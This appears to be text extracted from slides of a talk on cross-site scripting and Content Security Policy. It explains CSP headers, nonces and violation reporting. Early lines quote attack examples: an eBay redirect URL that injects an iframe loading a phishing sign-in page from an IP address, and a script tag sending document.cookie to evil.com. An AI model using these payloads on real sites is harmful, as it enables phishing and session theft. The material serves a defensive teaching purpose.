http://ebay.com/link/?nav=webview&url= javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29
@thehackernews.com 2016
exploit.js
Confirmed vulnerable: WordPress 4.2, 4.1.2, 4.1.1, 3.9.3.
Tested with MySQL versions 5.1.53 and 5.5.41.
../wp-content/plugins/hello.php
"XSS is found around two thirds of all applications"
CSP defines the Content-Security-Policy HTTP header that allows you to create a whitelist of sources of trusted content
Content-Security-Policy: script-src 'self' code.jquery.com
HTTP
<script> new Image('http://evil.com/?cookie=' + document.cookie);</script>
HTML
console
Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self' code.jquery.com".
CSP level 2
CSP level 2
CSP level 2
Content-Security-Policy: script-src 'nonce-EDNnf03nceIOfn39fn3e9h3sdfa'
HTTP
<script nonce=EDNnf03nceIOfn39fn3e9h3sdfa> // Some inline code I can't remove yet, but need to asap. </script>
HTML
Content-Security-Policy: default-src 'self'; report-uri /my_amazing_csp_report_parser;
HTTP
{
"csp-report": {
"document-uri": "http://example.org/page.html",
"referrer": "http://evil.example.com/",
"blocked-uri": "http://evil.example.com/evil.js",
"violated-directive": "script-src 'self' https://apis.google.com",
"original-policy": "script-src 'self' https://apis.google.com;
report-uri http://example.org/my_amazing_csp_report_parser"
}
}
Enable CSP early as possible
in development mode
Content-Security-Policy-Report-Only: default-src 'self'; report-uri /my_amazing_csp_report_parser;
HTTP